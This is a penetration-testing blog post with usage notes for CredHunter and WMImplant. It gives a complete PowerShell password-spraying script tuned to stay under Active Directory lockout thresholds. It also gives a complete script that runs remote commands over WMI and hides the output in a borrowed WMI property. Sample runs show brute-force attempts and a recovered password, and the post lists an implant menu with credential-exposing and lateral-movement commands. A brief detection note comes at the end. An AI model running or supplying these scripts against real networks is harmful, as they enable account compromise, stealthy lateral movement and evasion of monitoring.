
CredHunter & WMImplant

March 30, 2017 • Security

Usage notes on two PowerShell scripts I have been using recently for internal network penetration.

CredHunter

Find every domain user whose password is the same as their username (CredHunter warns up front that it is not opsec safe: each check is a real authentication attempt, so it counts against the domain lockout threshold):

PS C:\Users\jamie\Desktop> Invoke-CredHunter -Verbose
[*] WARNING: This module is not opsec safe! Be wary of locking accounts
[*] Do you want to continue?: Y
VERBOSE: Get-DomainSearcher search string: LDAP://DC=lannister,DC=house
Brute Forcing Active Directory lannister.house
VERBOSE: Checking Administrator : Administrator
VERBOSE: Checking Guest : Guest
VERBOSE: Checking krbtgt : krbtgt
VERBOSE: Checking jamie : jamie
VERBOSE: Checking tywin : tywin
VERBOSE: Checking tyrion : tyrion
VERBOSE: Checking cersei : cersei
VERBOSE: Checking kevan : kevan
PS C:\Users\jamie\Desktop>

Use a wildcard on -UserName to limit the check to matching accounts (here, every account with "admin" in its name):

PS C:\Users\jamie\Desktop> Invoke-CredHunter -Verbose -UserName "*admin*"
[*] WARNING: This module is not opsec safe! Be wary of locking accounts
[*] Do you want to continue?: Y
VERBOSE: Get-DomainSearcher search string: LDAP://DC=lannister,DC=house
Brute Forcing Active Directory lannister.house
VERBOSE: Checking Administrator : Administrator
PS C:\Users\jamie\Desktop>

Look for weak passwords only on accounts with the LDAP adminCount=1 attribute set (protected, typically privileged, accounts):

PS C:\Users\jamie\Desktop> Invoke-CredHunter -Verbose -AdminCount
[*] WARNING: This module is not opsec safe! Be wary of locking accounts
[*] Do you want to continue?: Y
VERBOSE: Get-DomainSearcher search string: LDAP://DC=lannister,DC=house
VERBOSE: Checking for adminCount=1
Brute Forcing Active Directory lannister.house
VERBOSE: Checking Administrator : Administrator
VERBOSE: Checking krbtgt : krbtgt
PS C:\Users\jamie\Desktop>

Supply custom passwords on the command line (each is tried against every account, in addition to the username itself):

PS C:\Users\jamie\Desktop> Invoke-CredHunter -Verbose -CustomPasswords password,letmein,secret
[*] WARNING: This module is not opsec safe! Be wary of locking accounts
[*] Do you want to continue?: Y
VERBOSE: Get-DomainSearcher search string: LDAP://DC=lannister,DC=house
Brute Forcing Active Directory lannister.house
VERBOSE: Checking Administrator : Administrator
VERBOSE: Checking Administrator : password
VERBOSE: Checking Administrator : letmein
VERBOSE: Checking Administrator : secret
VERBOSE: Checking Guest : Guest
VERBOSE: Checking Guest : password
VERBOSE: Checking Guest : letmein
VERBOSE: Checking Guest : secret
VERBOSE: Checking krbtgt : krbtgt
VERBOSE: Checking krbtgt : password
VERBOSE: Checking krbtgt : letmein
VERBOSE: Checking krbtgt : secret
VERBOSE: Checking jamie : jamie
VERBOSE: Checking jamie : password
VERBOSE: Checking jamie : letmein
VERBOSE: Checking jamie : secret
VERBOSE: Checking tywin : tywin
VERBOSE: Checking tywin : password
Match found! tywin : password
VERBOSE: Checking tywin : letmein
VERBOSE: Checking tywin : secret
VERBOSE: Checking tyrion : tyrion
VERBOSE: Checking tyrion : password
VERBOSE: Checking tyrion : letmein
VERBOSE: Checking tyrion : secret
VERBOSE: Checking cersei : cersei
VERBOSE: Checking cersei : password
VERBOSE: Checking cersei : letmein
VERBOSE: Checking cersei : secret
VERBOSE: Checking kevan : kevan
VERBOSE: Checking kevan : password
VERBOSE: Checking kevan : letmein
VERBOSE: Checking kevan : secret
PS C:\Users\jamie\Desktop>
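The four runs above share one risk that CredHunter only warns about: every "Checking user : password" line is a failed LDAP bind that raises that account's badPwdCount, and enough of them within the observation window lock the account. The following is an added example, not CredHunter's code, that does the same username-as-password, -UserName wildcard, -AdminCount and -CustomPasswords checks with plain .NET/ADSI calls but first reads the domain lockout policy and each account's current badPwdCount, and never spends more attempts than the threshold allows. It assumes the host is domain-joined and the caller can read user attributes; the function names and the -Margin parameter are hypothetical.

```powershell
# Added example (not CredHunter's own code): lockout-aware username-as-password check.
# Assumptions: domain-joined host, read access to user attributes; names are hypothetical.

function Get-DomainLockoutPolicy {
    param([string]$Server)
    $rootDse  = [ADSI]"LDAP://$Server/RootDSE"
    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.SearchRoot  = [ADSI]"LDAP://$Server/$($rootDse.defaultNamingContext)"
    $searcher.SearchScope = 'Base'
    $searcher.Filter      = '(objectClass=domainDNS)'
    [void]$searcher.PropertiesToLoad.AddRange(@('lockoutThreshold', 'lockoutObservationWindow'))
    $d = $searcher.FindOne()
    # lockoutObservationWindow is stored as a negative 100-ns interval; threshold 0 = no lockout.
    [pscustomobject]@{
        Threshold         = [int]$d.Properties['lockoutthreshold'][0]
        ObservationWindow = [TimeSpan]::FromTicks(-1 * [int64]$d.Properties['lockoutobservationwindow'][0])
    }
}

function Get-CandidateUsers {
    param([string]$Server, [string]$UserName = '*', [switch]$AdminCount)
    $rootDse = [ADSI]"LDAP://$Server/RootDSE"
    # Skip disabled accounts (userAccountControl bit 0x2, e.g. krbtgt and Guest above),
    # so no attempts are wasted on logons that can never succeed.
    $filter = "(&(objectCategory=person)(objectClass=user)(sAMAccountName=$UserName)" +
              "(!(userAccountControl:1.2.840.113556.1.4.803:=2))"
    if ($AdminCount) { $filter += '(adminCount=1)' }
    $filter += ')'
    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.SearchRoot = [ADSI]"LDAP://$Server/$($rootDse.defaultNamingContext)"
    $searcher.Filter     = $filter
    $searcher.PageSize   = 1000
    [void]$searcher.PropertiesToLoad.AddRange(@('sAMAccountName', 'badPwdCount'))
    foreach ($r in $searcher.FindAll()) {
        $bad = 0
        if ($r.Properties['badpwdcount'].Count -gt 0) { $bad = [int]$r.Properties['badpwdcount'][0] }
        [pscustomobject]@{ Name = [string]$r.Properties['samaccountname'][0]; BadPwdCount = $bad }
    }
}

function Test-AdCredential {
    param([string]$Server, [string]$Upn, [string]$Password)
    # One LDAP bind as the candidate. A wrong password throws when NativeObject is
    # touched, and still increments badPwdCount on the DC that handled it.
    try {
        $entry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$Server", $Upn, $Password)
        $null = $entry.NativeObject
        $entry.Dispose()
        $true
    } catch { $false }
}

function Invoke-SafeCredCheck {
    [CmdletBinding()]
    param([string]$UserName = '*', [switch]$AdminCount, [string[]]$CustomPasswords = @(), [int]$Margin = 2)
    $domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
    # badPwdCount is not replicated; the PDC emulator holds the most accurate count.
    $pdc    = $domain.PdcRoleOwner.Name
    $policy = Get-DomainLockoutPolicy -Server $pdc
    Write-Verbose "Lockout threshold $($policy.Threshold), window $($policy.ObservationWindow)"

    foreach ($u in Get-CandidateUsers -Server $pdc -UserName $UserName -AdminCount:$AdminCount) {
        $candidates = @($u.Name) + $CustomPasswords
        if ($policy.Threshold -gt 0) {
            # Attempts left before lockout, minus a safety margin for logons from elsewhere.
            $budget = $policy.Threshold - $Margin - $u.BadPwdCount
            if ($budget -le 0) {
                Write-Warning "Skipping $($u.Name): $($u.BadPwdCount) bad attempts already recorded"
                continue
            }
            $candidates = $candidates | Select-Object -First $budget
        }
        foreach ($p in $candidates) {
            Write-Verbose "Checking $($u.Name) : $p"
            if (Test-AdCredential -Server $pdc -Upn "$($u.Name)@$($domain.Name)" -Password $p) {
                "Match found! $($u.Name) : $p"
                break
            }
        }
    }
}

# Usage, mirroring the -AdminCount and -CustomPasswords runs above:
# Invoke-SafeCredCheck -Verbose -AdminCount -CustomPasswords password,letmein,secret
```

If the policy reports a threshold of 0 there is no lockout and the budget logic is skipped, which is exactly the situation in which a spray like CredHunter's is cheap for an attacker and worth flagging to the domain owners. With a threshold set, the remaining attempts per account are the threshold minus the margin minus what is already recorded, so a long -CustomPasswords list is silently truncated per account rather than locking it; re-run after the observation window has passed to try the rest.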

WMImplant

Command menu

change_user                         -   Change the context of the user you will execute WMI commands as
exit                                -   Exits WMImplant
gen_cli                             -   Generate the command line command to use WMImplant non-interactively
set_default                         -   Sets the targeted system's WMI property back to its default value
help                                -   View the list of commands and descriptions

File operations

cat                                 -   Reads the contents of a file
download                            -   Download a file from the targeted machine
ls                                  -   File/Directory listing of a specific directory
search                              -   Search for a file on a user-specified drive
upload                              -   Upload a file to the targeted machine

Lateral movement

command_exec                        -   Run a command line command and receive the output
disable_wdigest                     -   Removes registry value UseLogonCredential
disable_winrm                       -   Disables WinRM on the targeted system
enable_wdigest                      -   Adds registry value UseLogonCredential
enable_winrm                        -   Enables WinRM on the targeted system
registry_mod                        -   Modify the registry on the targeted machine
remote_posh                         -   Run a PowerShell script on a remote machine and receive the output
sched_job                           -   Manipulate scheduled jobs
service_mod                         -   Create, delete, or modify system services

Process operations

process_kill                        -   Kill a process via name or process id on the targeted machine
process_start                       -   Start a process on the targeted machine
ps                                  -   Process listing

System operations

active_users                        -   List domain users with active processes on the targeted system
basic_info                          -   Used to enumerate basic metadata about the targeted system
drive_list                          -   List local and network drives
ifconfig                            -   Receive IP info from NICs with active network connections
installed_programs                  -   Receive a list of the installed programs on the targeted machine
logoff                              -   Log users off the targeted machine
reboot                              -   Reboot the targeted machine
power_off                           -   Power off the targeted machine
vacant_system                       -   Determine if a user is away from the system

Log operations

logon_events                        -   Identify users that have logged onto a system
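The command list above shows the property that makes a WMI-only implant work: command_exec returns output, and set_default puts "the targeted system's WMI property back to its default value", which implies the output travels through a WMI property rather than over SMB or WinRM. The following is an added example, not WMImplant's own code, of that pattern built from stock PowerShell WMI cmdlets: run a command with Win32_Process.Create, have the target stash the output in a writable WMI string property, read it back and restore the property. It assumes local administrator rights on the target, DCOM/RPC reachability, and borrows the DebugFilePath property of Win32_OSRecoveryConfiguration (default value %SystemRoot%\MEMORY.DMP) as the scratch channel; which property WMImplant itself uses is not stated on this page, and the function names are hypothetical.

```powershell
# Added example (not WMImplant's own code): command execution with output retrieval over WMI only.
# Assumptions: local admin on the target, DCOM/RPC reachable, DebugFilePath used as scratch
# storage. Function names are hypothetical.

function Wait-WmiProcess {
    param([hashtable]$WmiArgs, [int]$ProcessId, [int]$TimeoutSeconds)
    # Poll Win32_Process until the PID is gone (process exited) or the timeout passes.
    $deadline = (Get-Date).AddSeconds($TimeoutSeconds)
    while ((Get-Date) -lt $deadline) {
        if (-not (Get-WmiObject @WmiArgs -Class Win32_Process -Filter "ProcessId=$ProcessId")) { return $true }
        Start-Sleep -Milliseconds 500
    }
    $false
}

function Reset-WmiScratchProperty {
    param([hashtable]$WmiArgs)
    # The set_default step: put the borrowed property back so nothing is left behind.
    $cfg = Get-WmiObject @WmiArgs -Class Win32_OSRecoveryConfiguration
    $cfg.DebugFilePath = '%SystemRoot%\MEMORY.DMP'
    [void]$cfg.Put()
}

function Invoke-WmiCommandExec {
    param(
        [Parameter(Mandatory)] [string]$ComputerName,
        [Parameter(Mandatory)] [string]$Command,
        [pscredential]$Credential,
        [int]$TimeoutSeconds = 30
    )
    $wmiArgs = @{ ComputerName = $ComputerName }
    if ($Credential) { $wmiArgs.Credential = $Credential }

    # 1. Launch the command via Win32_Process.Create with output redirected to a temp file.
    #    ReturnValue 0 only means the process was created, not that the command succeeded.
    $remoteFile = "C:\Windows\Temp\$([guid]::NewGuid().ToString('N')).txt"
    $run = Invoke-WmiMethod @wmiArgs -Class Win32_Process -Name Create `
        -ArgumentList "cmd.exe /c $Command > `"$remoteFile`" 2>&1"
    if ($run.ReturnValue -ne 0) { throw "Win32_Process.Create failed: $($run.ReturnValue)" }
    if (-not (Wait-WmiProcess -WmiArgs $wmiArgs -ProcessId $run.ProcessId -TimeoutSeconds $TimeoutSeconds)) {
        throw "Command did not finish within $TimeoutSeconds s"
    }

    # 2. Have the target base64-encode the file into the WMI string property and delete
    #    the file, so the result comes back through WMI without SMB or WinRM.
    $script = @"
`$b = [Convert]::ToBase64String([IO.File]::ReadAllBytes('$remoteFile'))
`$r = Get-WmiObject -Class Win32_OSRecoveryConfiguration
`$r.DebugFilePath = `$b
`$r.Put() | Out-Null
Remove-Item -Force '$remoteFile'
"@
    $encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($script))
    $stash = Invoke-WmiMethod @wmiArgs -Class Win32_Process -Name Create `
        -ArgumentList "powershell.exe -NoProfile -NonInteractive -EncodedCommand $encoded"
    if ($stash.ReturnValue -ne 0) { throw "Stash process failed: $($stash.ReturnValue)" }
    [void](Wait-WmiProcess -WmiArgs $wmiArgs -ProcessId $stash.ProcessId -TimeoutSeconds $TimeoutSeconds)

    # 3. Read the property back and decode it. cmd.exe writes in the target's OEM code page,
    #    so ASCII output decodes cleanly; other text may need re-decoding.
    $cfg = Get-WmiObject @wmiArgs -Class Win32_OSRecoveryConfiguration
    $output = [Text.Encoding]::Default.GetString([Convert]::FromBase64String($cfg.DebugFilePath))

    # 4. Restore the property, then return the command output.
    Reset-WmiScratchProperty -WmiArgs $wmiArgs
    $output
}

# Usage:
# Invoke-WmiCommandExec -ComputerName srv01 -Command 'whoami /all' -Credential (Get-Credential)
```

This example does not chunk large outputs, so a result that exceeds what the string property accepts will fail at Put(). On the defensive side, the pattern is visible in exactly the places the command list hints at: the child process is spawned by WmiPrvSE.exe (parent process in Security 4688 or Sysmon event 1), the remote calls show up in the Microsoft-Windows-WMI-Activity/Operational log, and the traffic is DCOM on TCP 135 plus a dynamic RPC port rather than 445 or 5985, so a host that has WinRM disabled with disable_winrm is no harder to reach this way.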
